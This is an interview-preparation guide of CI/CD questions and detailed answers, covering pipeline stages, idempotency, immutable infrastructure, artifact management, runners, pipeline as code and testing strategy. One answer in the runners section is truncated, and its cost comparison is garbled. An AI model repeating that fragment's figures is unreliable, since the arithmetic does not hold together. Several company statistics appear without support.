CI/CD Interview Questions (60+ Detailed Q&A)
1. Concepts & Pipelines
1. CI vs CD vs CD
- CI (Continuous Integration): Developers merge code to a shared branch frequently (multiple times per day). Every merge triggers an automated build and test run. The goal is to detect integration bugs within minutes, not days. In practice, this means your team maintains a green trunk — if the build breaks, it’s the top priority. At companies like Google, the CI pipeline runs ~800M test cases per day across their monorepo.
- CD (Continuous Delivery): Every commit that passes CI produces a deployable artifact (Docker image, JAR, binary). The artifact could go to production at any moment, but a human makes the final call. Think of it as “always releasable.” Netflix practices this — every merged commit produces a baked AMI that’s ready for production, but a release engineer clicks the button.
- CD (Continuous Deployment): Zero human gates. Every commit that passes the full pipeline (unit tests, integration tests, security scans, canary analysis) automatically deploys to production. GitHub deploys to production 80+ times per day this way. The prerequisite is extreme confidence in your test suite and observability.
- “Why would a company choose Continuous Delivery over Continuous Deployment?” Regulatory environments (healthcare, finance) often require audit trails with human sign-off. SOC 2 compliance may mandate a change approval record. Also, if your test coverage is below ~80% or you lack production observability, full deployment is reckless — you’re deploying without a safety net. Some teams also need coordinated releases across multiple services where a human orchestrator makes the timing call.
- “What’s the hardest part of moving from Delivery to Deployment?” Database migrations and backward-compatible schema changes. Code rollback is easy (deploy the previous artifact), but you can’t un-run a migration that dropped a column. Teams need to adopt expand-and-contract migration patterns. The second hardest part is building enough trust in the test suite — one flaky test that blocks production deploys and the team loses faith in the whole system within a week.
- “How do you handle a hotfix in a Continuous Deployment setup?” Same pipeline, no shortcuts. The hotfix commit goes through the same CI/CD pipeline but the pipeline is fast enough (under 15 minutes) that this isn’t painful. If your pipeline takes 45 minutes and you need a hotfix in 10, that’s a pipeline speed problem to fix, not a reason to add a bypass lane. Some teams maintain a “fast track” pipeline profile that runs only critical tests for hotfix branches, but this is a calculated risk.
2. Idempotency in DevOps
- Non-idempotent: `mkdir flow` fails on the second run. `echo "line" >> config` appends duplicates. `INSERT INTO` creates duplicate rows. A deploy script that `curl`s a binary and moves it into place might leave partial files on failure.
- Idempotent: `mkdir -p flow` succeeds every time. `INSERT ... ON CONFLICT DO NOTHING`. Terraform’s `apply` compares desired state to current state and only makes necessary changes. Ansible modules check current state before acting (e.g., the `apt` module checks if the package is already installed before running install).
- “Give me an example where lack of idempotency caused a production incident.” Classic scenario: a database migration script that adds a column runs during deploy. Deploy fails after migration but before app startup. Pipeline retries, migration runs again, crashes with “column already exists.” Now the deploy is stuck: the migration can’t re-run and the app can’t start without the migration. Fix: every migration should check preconditions (`IF NOT EXISTS`), or use a migration tool like Flyway that tracks which migrations have already been applied.
- “How do you make a shell script idempotent?” Guard every mutating operation with a check. Use `grep -q` before appending to files. Use `id -u username` before `useradd`. Use `test -f` before downloading files. Use lock files for operations that shouldn’t overlap. Better yet, replace shell scripts with declarative tools (Ansible, Terraform) that handle idempotency natively. Shell scripts become maintenance nightmares at scale because every new line needs its own idempotency guard.
- “Is a Docker build idempotent?” Mostly yes, but with caveats. `RUN apt-get update && apt-get install -y curl` might install different versions of curl on different days because the package index changes. Pinning versions (`curl=7.88.1-1`) makes it idempotent. Using `--no-cache` forces every layer to rebuild, which avoids stale cached layers but is slower and does not pin anything by itself. The build is deterministic given the same inputs, but “same inputs” is harder to guarantee than people think.
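The "guard every mutating operation with a check" advice can be sketched in a few lines. This is a minimal illustration, not a recommended tool: `ensure_line` is a hypothetical helper name, and it plays the role of `grep -q` followed by `echo ... >> config`.

```python
from pathlib import Path


def ensure_line(path: Path, line: str) -> bool:
    """Append `line` to `path` only if it is not already present.

    Returns True if the file was changed, False if it was already
    in the desired state (so re-running is harmless).
    """
    text = path.read_text() if path.exists() else ""
    if line in text.splitlines():
        return False  # already converged, nothing to do
    # Start on a fresh line if the file lacks a trailing newline.
    prefix = "" if text == "" or text.endswith("\n") else "\n"
    with path.open("a") as fh:
        fh.write(prefix + line + "\n")
    return True
```

Calling it twice with the same arguments changes the file once; the second call is a no-op, which is the property a retried pipeline step needs.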
3. Pipeline Stages
- Checkout: Pull source code. Validate branch protections.
- Install Dependencies: `npm ci` (not `npm install`, because `npm ci` is deterministic). Cache `node_modules` using lockfile hash.
- Lint / Format Check: ESLint, Prettier, `gofmt`. Fast (seconds). Fail early on style issues. This catches 20% of PR comments automatically.
- Compile / Build: TypeScript compilation, Go build, Webpack bundle. Catches type errors, import issues.
- Unit Tests: Fast, isolated. Target < 3 minutes. Fail fast. These run in parallel across test shards.
- SAST (Static Application Security Testing): SonarQube, Semgrep. Catch SQL injection patterns, hardcoded secrets, insecure crypto usage. Runs on source code, not running app.
- SCA (Dependency Scan): Snyk, Dependabot. Check `package-lock.json` / `go.sum` against CVE databases. Block on Critical/High CVEs.
- Package: Build Docker image. Multi-stage build to minimize image size. Tag with git SHA (not `latest`).
- Container Scan: Trivy, Clair. Scan image layers for OS-level vulnerabilities.
- Publish Artifact: Push to ECR/GCR/Artifactory. This artifact is immutable: the same image promotes through all environments.
- Deploy to Dev: Automatic. Kubernetes apply or Helm upgrade.
- Integration Tests: Service + real database. API contract tests. Target < 10 minutes.
- Deploy to Staging: Mirror of production. Same instance types, same configurations.
- E2E Tests: Cypress/Playwright. Full user journeys. Target < 15 minutes. Quarantine flaky tests.
- Performance Tests: K6/Locust. Regression check against baseline latency. Run on staging with production-like load.
- Security Gate / Manual Approval: Required for regulated environments. Change ticket auto-created.
- Deploy to Prod: Canary/Blue-Green. Automated rollback on error spike.
- Smoke Tests: Post-deploy. Hit health endpoints. Verify critical user flows. Alert on failure.
- Notify: Slack notification, DORA metrics update, deployment record.
- “Your pipeline takes 45 minutes. How do you cut it to 15?” First, measure where time goes (usually tests and Docker builds). Parallelize unit tests across shards. Cache Docker layers and dependencies aggressively. Run independent stages concurrently (lint + unit tests + SAST in parallel). Use test impact analysis to only run tests affected by changed files. Move E2E tests to a post-merge pipeline so they don’t block PRs. Replace full Docker rebuilds with layer caching. At Shopify, they cut CI from 25 minutes to 5 minutes by sharding tests and caching aggressively.
- “Which stages are mandatory vs. nice-to-have?” Non-negotiable: build, unit tests, SAST, artifact publish, deploy. Nice-to-have but highly recommended: integration tests, E2E, container scanning, performance tests. The line depends on risk tolerance. A startup shipping an internal tool can skip E2E. A payments company processing $1M/day cannot skip security scans.
- “How do you handle a stage that’s flaky but important?” Quarantine it. Run it in a non-blocking parallel track. Report results but don’t fail the pipeline. Track flakiness rate. If a test fails > 5% of runs without code changes, it’s flaky. Fix the root cause (usually test isolation, timing dependencies, or shared state). Never just add retries without investigating — that hides real failures.
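The "fails > 5% of runs without code changes" rule can be made concrete. The sketch below is one possible interpretation, under the assumption that a failure is "without code changes" when the same test also passed on the same commit; `flaky_tests` and the tuple layout are hypothetical.

```python
from collections import defaultdict


def flaky_tests(runs, threshold=0.05):
    """Return {test_name: flake_rate} for tests above the threshold.

    runs: iterable of (test_name, commit_sha, passed) tuples.
    """
    outcomes = defaultdict(lambda: defaultdict(list))
    for test, sha, passed in runs:
        outcomes[test][sha].append(passed)

    flaky = {}
    for test, by_sha in outcomes.items():
        total = sum(len(results) for results in by_sha.values())
        # Count failures only on commits where the test also passed,
        # so a consistently failing test is treated as a real failure.
        unexplained = sum(
            results.count(False) for results in by_sha.values() if True in results
        )
        rate = unexplained / total
        if rate > threshold:
            flaky[test] = rate
    return flaky
```

A test that fails on every run of a commit is not reported here, which keeps real regressions out of the quarantine list.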
4. Mutable vs Immutable Infrastructure
- Mutable Infrastructure: You SSH into running servers and modify them in place: `apt-get update`, edit config files, restart services. The problem: after 6 months, no two servers are identical. This is configuration drift. Server A got a hotfix in March that Server B missed. Server C has a different OpenSSL version because an engineer ran a manual update during an incident. When you try to scale or reproduce an issue, you can’t because each server is a unique snowflake. These are sometimes called “pet” servers: you name them, nurture them, and panic when they get sick.
- Immutable Infrastructure: You never modify a running server. Instead, you build a new machine image (AMI, Docker image, VM snapshot) with all changes baked in, deploy it alongside the old one, shift traffic, and terminate the old one. Every server is identical because they came from the same image. These are “cattle” servers: they’re numbered, replaceable, and you don’t care which specific one serves a request.
- Reproducibility: Any environment can be recreated from the image + config.
- Rollback: Deploy the previous image. No need to reverse-engineer what changed.
- Security: No SSH access means smaller attack surface. Servers are read-only at runtime.
- Debugging: “Which server has the bug?” is answered by “all of them or none of them.”
Trade-offs: Slower changes (building and rolling out a new image, versus `apt-get install` taking seconds). More complex image build pipelines. Need a strategy for config that varies per environment (inject via environment variables or config services, never bake secrets into images).
Red flag answer: “Immutable means you can’t change anything.” This misses the point: you can change everything, you just do it by replacing the whole unit rather than modifying in place. It’s a deployment strategy, not a limitation.
Follow-up:
- “How do you handle configuration that differs between environments with immutable infrastructure?” The image is the same across dev, staging, and production. Environment-specific config is injected at runtime via environment variables, ConfigMaps (Kubernetes), Parameter Store (AWS SSM), or a config service like Consul. Secrets come from Vault or AWS Secrets Manager, never baked into the image. The principle: the artifact is immutable, the configuration is not.
- “What about emergency patches? Isn’t immutable slower for hotfixes?” Yes, marginally. Building a new image takes 3-5 minutes vs SSH + patch in 30 seconds. But the SSH hotfix creates drift, isn’t tracked, might not be applied to all servers, and definitely won’t be in the next deploy. The “slow” immutable path is actually faster when you count the hours spent debugging drift-related issues. Netflix deploys hundreds of times per day with fully immutable AMIs — speed comes from pipeline optimization, not from shortcuts.
- “Can containers be considered immutable infrastructure?” Yes, containers are the most common implementation of immutable infrastructure. A Docker image is a read-only filesystem. If a container is modified at runtime, those changes disappear when it restarts. Kubernetes enforces this naturally — pods are ephemeral and replaceable. The anti-pattern is mounting writable volumes for application code or shelling into running containers to modify behavior.
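As a small illustration of "the artifact is immutable, the configuration is not", the same code can read its environment-specific settings at startup. This is only a sketch: the variable names `DATABASE_URL` and `LOG_LEVEL` and the `Settings` class are assumptions for the example, not part of any particular platform.

```python
import os
from dataclasses import dataclass


@dataclass(frozen=True)
class Settings:
    database_url: str
    log_level: str


def load_settings(env=None) -> Settings:
    """Build settings from the process environment (or a mapping, for tests)."""
    env = os.environ if env is None else env
    try:
        database_url = env["DATABASE_URL"]
    except KeyError:
        # Fail fast at startup instead of falling back to a baked-in value.
        raise RuntimeError("DATABASE_URL must be injected at runtime") from None
    return Settings(database_url=database_url, log_level=env.get("LOG_LEVEL", "INFO"))
```

The image that runs this code is identical in dev, staging, and production; only the injected mapping differs.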
5. Configuration Management vs Provisioning
- Provisioning (Infrastructure as Code): Creating and managing the infrastructure itself. VPCs, subnets, load balancers, databases, DNS records, IAM roles. Tools: Terraform (multi-cloud, declarative, state-based), CloudFormation (AWS-only, YAML/JSON), Pulumi (general-purpose languages like TypeScript/Python instead of HCL). You’re answering: “What infrastructure exists?”
- Configuration Management: Installing software, configuring OS settings, managing services on already-provisioned machines. Tools: Ansible (agentless, SSH-based, push model), Chef (Ruby DSL, agent-based, pull model), Puppet (declarative, agent-based, pull model), Salt (Python, event-driven). You’re answering: “How is this machine configured?”
- “When would you use Ansible over Terraform, and vice versa?” Terraform for anything that has a lifecycle (create, update, destroy) and state — infrastructure resources. Ansible for procedural tasks on existing machines — installing packages, copying files, running scripts. If you need to SSH into a box and configure it, that’s Ansible. If you need to create the box itself, that’s Terraform. For Kubernetes-native workloads, you might skip both and use Helm + ArgoCD.
- “What happens when Terraform state drifts from reality?” Someone manually changed a resource in the AWS console. `terraform plan` will show the drift and propose changes to reconcile. You can `terraform import` to bring manually-created resources into state, or update state to match reality with `terraform apply -refresh-only` (the replacement for the now-deprecated `terraform refresh`). The real fix is preventing drift: lock down console access, require all changes through IaC, use drift detection tools (Driftctl, Spacelift) to alert on manual changes.
- “Is configuration management still relevant in a containerized world?” Less so than before. Containers bake software installation and OS-level setup into images at build time. Kubernetes handles orchestration and desired-state management. But configuration management isn’t dead: it’s still essential for managing the nodes themselves (Kubernetes worker node setup), legacy systems not yet containerized, and bare-metal infrastructure. Even in a fully containerized setup, someone has to configure the host OS, install container runtimes, and manage certificates.
6. Monorepo vs Polyrepo CI
- Monorepo (Single repo, multiple projects/services):
  - CI Challenge: A change to a shared library could break 50 services. You need smart change detection: “Did `/packages/auth-lib` change? Rebuild all services that depend on it.” Tools: Nx, Turborepo, Bazel, Lerna. Without this, every commit rebuilds everything (Google’s monorepo has ~2 billion lines of code, and they run ~150M+ builds/day using Bazel’s dependency graph).
  - Pros: Atomic cross-service changes (update an API contract and all consumers in one PR). Shared tooling and CI config. Easier code reuse. Consistent dependency versions.
  - Cons: CI complexity scales with repo size. A broken shared test blocks everyone. Requires investment in custom tooling. Git performance degrades at extreme scale (Meta uses a custom VCS).
- Polyrepo (One repo per service):
  - CI is simple: Repo change = pipeline runs. No dependency graph needed. Each team owns their pipeline.
  - Pros: Clear ownership boundaries. Independent deploy cadence. Smaller CI scope.
  - Cons: “Dependency hell”: Service A depends on shared-lib v2.1, Service B on v2.3. Cross-repo changes require coordinated PRs across multiple repos. Shared CI configuration is copy-pasted and drifts. Versioning of internal libraries becomes a major coordination cost.
- “How do you implement affected-project detection in a monorepo?” Build a dependency graph of projects. On each PR, compute which files changed (`git diff --name-only`), map those files to projects, then traverse the dependency graph upward to find all affected projects. Nx does this with `nx affected`. Turborepo uses content hashing. Bazel uses fine-grained build targets. The dependency graph can be static (declared in config) or dynamic (inferred from import statements).
- “How do you handle a monorepo where CI takes 2 hours?” Remote caching (share build artifacts across developers and CI: if someone already built the same input hash, reuse the output). Distributed task execution (spread test shards across machines). Affected-only builds (skip unchanged projects). Separate critical-path tests (run fast tests in PR pipeline, slow tests post-merge). At Vercel, Turborepo’s remote cache reduced average CI from 45 minutes to 7 minutes by avoiding redundant work.
- “Can you mix monorepo and polyrepo?” Yes, and many companies do. A common pattern: monorepo for the core platform (10 tightly-coupled services), polyrepo for independent services or experimental projects. Shared libraries are published as versioned packages from the monorepo and consumed by polyrepo services. The key is having a clear boundary for what goes in the monorepo vs. not.
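The affected-project steps described above (changed files, map to projects, walk the graph toward dependents) can be sketched as follows. This is an illustrative toy with a statically declared graph, not how Nx, Turborepo, or Bazel implement it; the function and parameter names are hypothetical.

```python
from collections import deque


def affected_projects(changed_files, project_roots, depends_on):
    """Return the set of projects that need rebuilding.

    changed_files: paths as printed by `git diff --name-only`.
    project_roots: {project: directory prefix inside the repo}.
    depends_on:    {project: [projects it depends on]}.
    """
    # Invert the graph so we can walk from a library to its dependents.
    dependents = {}
    for project, deps in depends_on.items():
        for dep in deps:
            dependents.setdefault(dep, set()).add(project)

    # Map changed files to the projects that own them.
    directly_changed = {
        project
        for project, root in project_roots.items()
        if any(f.startswith(root.rstrip("/") + "/") for f in changed_files)
    }

    # Breadth-first traversal "upward" through dependents.
    affected = set(directly_changed)
    queue = deque(directly_changed)
    while queue:
        current = queue.popleft()
        for dependent in dependents.get(current, ()):
            if dependent not in affected:
                affected.add(dependent)
                queue.append(dependent)
    return affected
```

With `api` depending on `auth-lib` and `web` depending on `api`, a change under `packages/auth-lib/` marks all three as affected, while an unrelated project is skipped.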
7. Artifact Management
- Build once, deploy everywhere. The artifact built in CI is the exact same binary that runs in dev, staging, and production. Never rebuild per environment — that risks subtle differences (different dependency versions resolved at build time, different build flags).
- Immutability. Once published, an artifact version is never overwritten. `v1.2.3` always points to the same bytes. If you need a fix, publish `v1.2.4`. Overwriting artifacts is how “but it worked in staging” incidents happen.
- Versioning. Tag artifacts with the git SHA (`myapp:a1b2c3d`) for traceability, and optionally with semver for release management. Never use `latest` in production: it’s ambiguous and non-reproducible.
- Container registries: ECR (AWS), GCR/Artifact Registry (GCP), ACR (Azure), Docker Hub, Harbor (self-hosted).
- Package registries: Nexus, Artifactory (both support multiple formats — Maven, npm, PyPI, Docker).
- Language-specific: npm registry, PyPI, Maven Central, Go modules proxy.
- Retention policies: Delete artifacts older than 90 days except tagged releases. ECR lifecycle policies automate this. Without cleanup, storage costs grow linearly and registries slow down.
- Vulnerability scanning: Scan artifacts on push and on a recurring schedule (new CVEs are discovered daily for already-published images).
- Promotion model: Artifacts flow `dev -> staging -> prod` via metadata/tags, not by rebuilding. Some teams use separate registries per environment with promotion policies.
- “What happens if your artifact registry goes down during a deploy?” If using Kubernetes, existing pods keep running (images are already pulled and cached on nodes). New pods can’t start because they can’t pull the image. Mitigation: use `imagePullPolicy: IfNotPresent` (not `Always`) for tagged images (never for `latest`), run a local registry mirror/cache (Harbor can proxy Docker Hub), and ensure your registry has multi-AZ redundancy. Some teams pre-pull critical images to all nodes as part of deployment prep.
- “How do you trace a running container back to its source code?” Tag images with the git SHA. Add OCI labels to the Dockerfile: `LABEL org.opencontainers.image.revision=$GIT_SHA`. Use `docker inspect` to read labels. For full provenance, implement SLSA (Supply-chain Levels for Software Artifacts), which creates a signed attestation linking the artifact to the exact source commit, build config, and builder identity.
- “How do you handle artifact promotion across environments?” Option 1: Same registry, different tags. Build produces `myapp:a1b2c3d`. After staging tests pass, add tag `myapp:staging-approved`. After prod smoke tests, add `myapp:prod-release-2024-01-15`. Option 2: Separate registries per environment with a promotion pipeline that copies the image. The key is that the image bytes never change; only the metadata changes.
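The two rules above (published versions are write-once, promotion only moves metadata) can be modelled with a toy in-memory registry. This is a sketch for reasoning about the model, not a client for any real registry; the `Registry` class and its methods are hypothetical.

```python
class Registry:
    """Toy registry: version tags are write-once, promotions are movable pointers."""

    def __init__(self):
        self._digests = {}     # immutable tag -> content digest
        self._promotions = {}  # environment -> immutable tag

    def publish(self, tag, digest):
        # Re-publishing identical bytes is harmless; different bytes are rejected.
        if tag in self._digests and self._digests[tag] != digest:
            raise ValueError(f"{tag} already published; publish a new version instead")
        self._digests[tag] = digest

    def promote(self, tag, environment):
        if tag not in self._digests:
            raise KeyError(f"unknown artifact {tag}")
        self._promotions[environment] = tag  # metadata only, no rebuild

    def resolve(self, environment):
        tag = self._promotions[environment]
        return tag, self._digests[tag]
```

Promoting `myapp:a1b2c3d` to staging and then to prod resolves to the same digest in both environments, which is the "build once, deploy everywhere" guarantee.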
8. Self-hosted vs SaaS Runners
- SaaS Runners (GitHub Actions hosted, GitLab.com shared, CircleCI cloud):
  - Pros: Zero maintenance. No patching, no scaling, no hardware procurement. Pay-per-minute pricing. Instant availability.
  - Cons: Shared execution environment (your code runs on machines other tenants also use, so side-channel attacks are possible). Limited hardware specs (typically 2 vCPU, 7GB RAM for free tier). No access to private network resources (can’t reach your VPC database without a VPN/tunnel). Costs explode at scale: a team running 10K pipeline-minutes/day pays roughly $2,400/month.
  - Security risk: Supply chain attacks via shared infrastructure. If a compromised action runs on a shared runner, it could potentially access cached credentials from other workflows. GitHub mitigates this with ephemeral runners, but the attack surface exists.
- Self-hosted Runners (Jenkins agents, GitHub Actions self-hosted, GitLab runners on your infra):
  - Pros: Full hardware control (GPU for ML builds, high-memory for large compilations). VPC access (can reach private databases, internal APIs). Cheaper at scale (an m5.xlarge spot instance costs ~$0.10/hr vs $0.48/hr for a GitHub Actions large runner). Custom tooling pre-installed. Compliance requirements satisfied (data never leaves your network).
  - Cons: You own the maintenance: patching, scaling, monitoring, disk cleanup. Runners accumulate state between jobs unless you make them ephemeral. Need auto-scaling (Kubernetes-based runners via Actions Runner Controller or GitLab Runner on K8s) to avoid over-provisioning.
- “How do you make self-hosted runners secure and ephemeral?” Run runners in containers or VMs that are destroyed after each job. On Kubernetes, use the Actions Runner Controller (ARC) which spins up a new pod per workflow run and deletes it after. On AWS, use autoscaling groups with spot instances that launch fresh for each job and terminate after. Never persist state between jobs — a compromised job could poison the cache for the next job. Disable Docker socket mounting unless absolutely necessary.
- “How do you handle auto-scaling for self-hosted runners?” Kubernetes-based: ARC scales runner pods based on pending workflow queue depth. AWS-based: a Lambda webhook listens for `workflow_job` events and scales an ASG up, the runner picks up the job, and the ASG scales down on idle. Key metrics: queue wait time (jobs waiting for a runner), runner utilization (avoid paying for idle runners), and job failure rate due to runner unavailability.
- “Your team spends …” … $0.10/hr running 10 jobs/hr vs $0.48/hr per job on Actions saves 80%. Long-term: optimize the pipeline itself with fewer tests, faster builds, and smarter affected detection.
9. Pipeline as Code
The pipeline definition lives in the repository as a file such as `Jenkinsfile`, `.github/workflows/ci.yml`, `.gitlab-ci.yml`, `bitbucket-pipelines.yml`, or `.circleci/config.yml`. This file is version controlled, peer reviewed in PRs, and its history is traceable via `git log`.
Why it matters:
- Auditability: “Who changed the deploy pipeline and when?” is answered by `git blame`. In Jenkins’s old UI-configured jobs, changes were untraceable and unreviewable.
- Reproducibility: Any branch can have its own pipeline definition. Feature branches can modify CI without affecting main. You can test pipeline changes before merging.
- Disaster recovery: If your CI server dies, you rebuild it and all pipeline definitions are already in Git. With UI-configured pipelines, you’d need backups of the CI server’s database.
- Reusability: Shared pipeline templates (GitHub Actions reusable workflows, GitLab CI `include`, Jenkins shared libraries) let platform teams provide standardized pipelines that product teams extend.
- Storing secrets in pipeline files (use secret managers and inject at runtime).
- Pipeline YAML that’s 2,000 lines long (break into reusable components).
- No tests for the pipeline itself (a broken pipeline blocks the entire team).
- “How do you test a pipeline change before merging to main?” On GitHub Actions: push the workflow change to a feature branch and it runs with the new definition. On Jenkins: use `Jenkinsfile` in a multibranch pipeline, where each branch runs its own `Jenkinsfile`. For complex pipeline changes, use a sandbox/test repo that mirrors the structure. Some teams have a “pipeline linter” in CI that validates YAML syntax and checks for common mistakes before the pipeline even runs.
- “How do you share pipeline logic across 50 microservices?” GitHub Actions: reusable workflows (`.github/workflows/shared-deploy.yml` in a central repo, `uses: org/shared-pipelines/.github/workflows/deploy.yml@v2`). GitLab CI: `include` with remote YAML files. Jenkins: shared libraries in Groovy. The platform team owns the shared pipeline and versions it. Product teams pin to a specific version and upgrade on their own schedule. This is critical: a breaking change to a shared pipeline shouldn’t break 50 services simultaneously.
- “What’s the biggest operational risk with Pipeline as Code?” A developer can modify the pipeline in their PR to exfiltrate secrets, skip security scans, or deploy to production from a feature branch. Mitigation: use `CODEOWNERS` to require platform team approval for workflow file changes. On GitHub Actions, use `pull_request_target` carefully: it runs the workflow definition from the base branch with access to repository secrets, so it must never check out and execute untrusted PR code. On Jenkins, use the `Jenkinsfile` from the trusted branch, not from the PR.
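A "pipeline linter" of the kind mentioned above could, for example, enforce the advice to pin shared workflows to a version. The sketch below is a deliberately simple line-based check, assuming GitHub Actions style `uses:` entries; the function name and the set of "moving" refs are assumptions for illustration, and a real linter would parse the YAML properly.

```python
import re

USES_RE = re.compile(r"^\s*(?:-\s*)?uses:\s*(\S+)")
MOVING_REFS = {"main", "master", "latest"}  # assumed list of unpinned refs


def unpinned_uses(workflow_text):
    """Return (line_number, reference) for `uses:` entries with no ref or a moving ref."""
    problems = []
    for number, line in enumerate(workflow_text.splitlines(), start=1):
        match = USES_RE.match(line)
        if not match:
            continue
        reference = match.group(1)
        if reference.startswith(("./", "docker://")):
            continue  # local paths and container images are out of scope here
        _, _, ref = reference.partition("@")
        if not ref or ref in MOVING_REFS:
            problems.append((number, reference))
    return problems
```

Run in CI against every workflow file, a non-empty result fails the build before an unpinned shared pipeline can change underneath a service.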
10. Fan-out / Parallelism
- Parallel stages: Lint, unit tests, SAST, and dependency scan run simultaneously because they’re independent. A 3-minute lint + 5-minute test + 4-minute SAST takes 5 minutes total instead of 12.
- Test sharding: Split 3,000 unit tests across 10 runners. Each runs 300 tests. Total time: ~1/10th of sequential. Tools: Jest `--shard`, pytest-xdist, Go (splitting the package list from `go list ./...` across runners), CircleCI’s test splitting, GitHub Actions matrix.
- Matrix builds: Test across multiple configurations simultaneously. Node 18, 20, 22. Ubuntu, macOS, Windows. Python 3.9, 3.10, 3.11. GitHub Actions `strategy.matrix` generates N jobs from a single definition.
- Shared state: Parallel tests that read/write the same database table will cause flakiness. Each shard needs its own test database or uses transactions that roll back.
- Resource contention: 10 parallel jobs on a 4-CPU runner means each job gets slow. Match parallelism to available resources.
- Cost: Matrix of 3 OS x 3 versions = 9 jobs. At $0.72 per run, 100 runs/day = $2,160/month. Be intentional about which combinations to test.
- Debugging: When 1 of 10 parallel shards fails, you need clear log isolation to find the failure without sifting through 9 successful shards.
- “How do you split tests evenly across shards?” Naive: alphabetical or file-count split. Problem: test files vary wildly in duration. Better: record test execution times from previous runs, then use timing-based splitting (CircleCI does this automatically). JUnit XML reports contain timing data. Split so each shard’s total time is roughly equal. At scale, use a test orchestrator service that dynamically assigns tests to shards as they become available (like Launchable or BuildPulse).
- “What’s the tradeoff between more parallelism and cost?” Diminishing returns. Going from 1 shard to 4 cuts time by ~75%. Going from 4 to 8 cuts by another ~50% of remaining time. Going from 8 to 16 adds cost but test overhead (setup, teardown, result aggregation) starts to dominate. Find the knee of the curve where cost/minute-saved starts increasing. For most teams, 4-8 shards for unit tests and 2-4 for E2E is the sweet spot.
- “How do you implement fan-in in GitHub Actions?” Use the `needs` keyword. Jobs `build-a`, `build-b`, `build-c` run in parallel. Job `deploy` has `needs: [build-a, build-b, build-c]` and only runs when all three succeed. For conditional fan-in (deploy even if one non-critical job fails), use `if: always()` combined with checking individual job outcomes via `needs.build-a.result == 'success'`.
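Timing-based splitting, as described in the sharding follow-up above, can be approximated with a greedy "longest test first, onto the lightest shard" heuristic. This is a sketch of that heuristic only, not a description of how CircleCI or any orchestrator does it; `split_by_timing` is a hypothetical name and the durations are assumed to come from a previous run's report.

```python
import heapq


def split_by_timing(durations, shard_count):
    """Assign tests to shards so total times are roughly equal.

    durations: {test_file: seconds recorded in a previous run}.
    Returns a list of shard_count lists of test files.
    """
    # Min-heap of (accumulated_seconds, shard_index): lightest shard on top.
    heap = [(0.0, index) for index in range(shard_count)]
    heapq.heapify(heap)
    shards = [[] for _ in range(shard_count)]
    # Place the longest tests first; ties broken by name for determinism.
    for test, seconds in sorted(durations.items(), key=lambda item: (-item[1], item[0])):
        total, index = heapq.heappop(heap)
        shards[index].append(test)
        heapq.heappush(heap, (total + seconds, index))
    return shards
```

The greedy result is not guaranteed to be optimal, but it avoids the worst case of an alphabetical split where one shard inherits all the slow files.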
2. Testing Strategies
11. The Testing Pyramid
- Base — Unit Tests (~70%): Test a single function, class, or module in isolation. Mock external dependencies. Execution time: milliseconds per test. These are your first line of defense and the foundation of developer confidence. A team with 5,000 unit tests that run in 2 minutes has a tight feedback loop.
- Middle — Integration Tests (~20%): Test interactions between components. Service + database. Service A calling Service B. No mocks for the components under test. Execution time: seconds per test. These catch the bugs that unit tests miss — “the function works correctly in isolation, but the SQL query it generates doesn’t match the actual schema.”
- Top — E2E Tests (~10%): Full user journey through the real UI with real services. Selenium, Cypress, Playwright. Execution time: 10-60 seconds per test. These catch the bugs that integration tests miss — “the API works but the frontend sends the wrong request format.”
- For API-only services with no UI, the pyramid becomes: unit tests + integration tests (heavy) + contract tests. No E2E.
- For frontend-heavy apps, the “Testing Trophy” (Kent C. Dodds) emphasizes integration tests over unit tests because testing React components in isolation provides less confidence than testing user interactions.
- For data pipelines, the pyramid inverts — you need heavy integration/E2E testing because unit testing a SQL transformation in isolation doesn’t catch schema mismatches.
- “Your team has 90% code coverage but bugs still reach production. Why?” Coverage measures lines executed, not behaviors validated. A test that calls a function without asserting the result contributes to coverage but catches nothing. Mutation testing (Stryker, PIT) is a better quality signal: it changes your code and checks if tests catch the mutation. If you mutate `>` to `>=` and no test fails, your tests are weak. Also, coverage can’t catch integration issues, such as a function that works correctly but was called with the wrong arguments by the caller.
- “When would you deliberately violate the testing pyramid?” When the risk profile demands it. A payments service can justify far more integration and E2E coverage than the pyramid suggests, because the cost of a production bug ($100K+ in chargebacks) far exceeds the cost of slower pipelines. Conversely, an internal admin tool used by 5 people can rely mostly on unit tests and manual smoke testing.
- “How do you convince a team with no tests to adopt the pyramid?” Start from the middle, not the bottom. Integration tests provide the most confidence-per-effort for a team with no testing culture. Write 10 integration tests covering the critical API endpoints. The team immediately sees bugs caught. Then introduce unit tests for new code (not retroactive — refactoring without tests to add tests is risky). E2E tests come last, covering only the 5 most critical user journeys. The key is demonstrating value quickly, not achieving perfect coverage.
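The `>` to `>=` mutation mentioned in the coverage follow-up can be shown by hand. This is a toy illustration of the idea behind mutation testing, not how Stryker or PIT work internally; the shipping rule, the threshold of 50, and all function names are invented for the example.

```python
def free_shipping(total):
    return total > 50  # original rule: strictly more than 50


def free_shipping_mutant(total):
    return total >= 50  # the mutation: > changed to >=


def weak_suite(fn):
    # Executes every line of fn (100% coverage) but never probes the boundary.
    return fn(100) is True and fn(10) is False


def strong_suite(fn):
    # Adds the boundary case, where original and mutant disagree.
    return weak_suite(fn) and fn(50) is False


def mutant_killed(suite):
    """A mutant is killed when the suite passes on the original and fails on the mutant."""
    return suite(free_shipping) and not suite(free_shipping_mutant)
```

Both suites reach full line coverage, yet only `strong_suite` kills the mutant, which is the gap between coverage and behavior validation.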
12. Unit vs Integration vs E2E
- Unit Tests: Test a single function, class, or module in total isolation. All external dependencies (database, HTTP clients, file system, clock) are mocked or stubbed. You’re testing pure logic: “Given this input, does this function return the correct output?”
  - Example: Testing a `calculateDiscount(price, customerTier)` function with various inputs.
  - Speed: Thousands per second. A Go project can run 10,000 unit tests in under 5 seconds.
  - Weakness: Mocks can diverge from real behavior. You test that `processPayment` calls `stripe.charge()` with the right arguments, but you don’t verify Stripe actually accepts those arguments.
- Integration Tests: Test the interaction between two or more real components. Typically service + database, service + message queue, or service A calling service B.
  - Example: Testing that `UserRepository.findByEmail()` executes the correct SQL and returns a properly mapped domain object from a real PostgreSQL instance (using Testcontainers to spin up a Postgres container).
  - Speed: Seconds per test. A suite of 200 integration tests might take 3-5 minutes.
  - Weakness: Slower, need infrastructure (databases, queues). Test isolation is harder: tests sharing a database can interfere with each other.
- E2E Tests: Test the full user journey through the real system, including the UI. A real browser interacts with a real frontend, which calls real APIs, which hit a real database.
  - Example: “User logs in, adds an item to cart, enters payment info, completes checkout, receives confirmation email.” Using Playwright or Cypress.
  - Speed: 10-60 seconds per test. A suite of 100 E2E tests might take 30-60 minutes.
